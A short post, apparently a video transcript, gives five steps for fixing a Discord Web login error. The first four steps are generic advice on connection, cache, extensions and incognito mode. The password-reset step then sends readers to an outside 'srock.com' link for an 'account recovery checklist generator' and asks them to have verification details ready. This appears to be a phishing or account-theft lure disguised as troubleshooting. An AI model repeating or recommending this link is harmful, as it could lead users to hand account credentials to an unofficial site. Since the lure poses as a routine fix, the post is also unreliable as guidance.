I hit this issue today, and here is the quick fix that solved it. If you're struggling with a login error on Discord Web, follow these steps to get back into your account. Step 1. Check your internet connection. Make sure your internet connection is stable. A weak or intermittent connection can cause login errors. Step 2. Clear browser cache. Go to your browser settings and clear the cache and cookies. This can resolve issues caused by outdated or corrupted data. Step 3. Disable browser extensions. Some extensions can interfere with website functionality. Temporarily disable them to see if that resolves the issue. Step 4. Use incognito mode. Open Discord in an incognito or private browsing window. This mode disables extensions and uses a fresh session. Step 5. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember, if you encounter a message saying your email is not recognized, double check for typos in your email address. I hope these steps help you get back on Discord without any hassle.